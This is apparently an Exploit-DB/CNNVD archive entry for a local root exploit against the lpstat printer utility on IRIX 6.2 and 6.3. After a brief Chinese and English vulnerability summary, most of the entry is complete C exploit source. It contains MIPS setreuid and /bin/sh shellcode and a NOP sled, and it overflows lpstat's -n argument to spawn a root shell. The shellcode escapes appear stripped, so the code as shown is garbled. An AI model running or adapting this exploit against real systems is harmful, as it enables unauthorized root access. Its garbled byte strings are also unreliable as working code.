https://www.exploit-db.com/exploits/20129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-117

IRIX6.2版本和6.3版本中lpstat存在缓冲区溢出漏洞。本地用户可以借助超长-n选项来提升根特权。

/*
source: http://www.securityfocus.com/bid/1529/info

Certain versions of IRIX ship with a version of lpstat which is vulnerable to a buffer overflow attack. The program, lpstat, is used to check the status of the printer being used by the IRIX machine. The problem is in the command line parsing section of the code whereby a user can supply an overly long string and overflow the buffer resulting in a possible root compromise. 
*/

/*## copyright LAST STAGE OF DELIRIUM nov 1998 poland        *://lsd-pl.net/ #*/
/*## /bin/lpstat                                                             #*/

#define NOPNUM 468
#define ADRNUM 300
#define PCHNUM 300

char setreuidcode[]=
    "x30x0bxffxff"    /* andi    $t3,$zero,0xffff     */
    "x24x02x04x01"    /* li      $v0,1024+1           */
    "x20x42xffxff"    /* addi    $v0,$v0,-1           */
    "x03xffxffxcc"    /* syscall                      */
    "x30x44xffxff"    /* andi    $a0,$v0,0xffff       */
    "x31x65xffxff"    /* andi    $a1,$t3,0xffff       */
    "x24x02x04x64"    /* li      $v0,1124             */
    "x03xffxffxcc"    /* syscall                      */
;

char shellcode[]=
    "x04x10xffxff"    /* bltzal  $zero,<shellcode>    */
    "x24x02x03xf3"    /* li      $v0,1011             */
    "x23xffx01x14"    /* addi    $ra,$ra,276          */
    "x23xe4xffx08"    /* addi    $a0,$ra,-248         */
    "x23xe5xffx10"    /* addi    $a1,$ra,-240         */
    "xafxe4xffx10"    /* sw      $a0,-240($ra)        */
    "xafxe0xffx14"    /* sw      $zero,-236($ra)      */
    "xa3xe0xffx0f"    /* sb      $zero,-241($ra)      */
    "x03xffxffxcc"    /* syscall                      */
    "/bin/sh"
;

char jump[]=
    "x03xa0x10x25"    /* move    $v0,$sp              */
    "x03xe0x00x08"    /* jr      $ra                  */
;

char nop[]="x24x0fx12x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b;
    int i;

    printf("copyright LAST STAGE OF DELIRIUM nov 1998 poland  //lsd-pl.net/n");
    printf("/bin/lpstat for irix 6.2 6.3 IP:17,19,20,21,22,32nn");

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8888+1364+140-15012;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8888+140+544+32748;

    b=buffer;
    *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    *b=0;

    execl("/bin/lpstat","lsd","-n",buffer,0);
}

来源:BUGTRAQ
名称:20000802[LSD]someunpublishedLSDexploitcodes
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1529
链接:http://www.securityfocus.com/bid/1529
来源:OSVDB
名称:1485
链接:http://www.osvdb.org/1485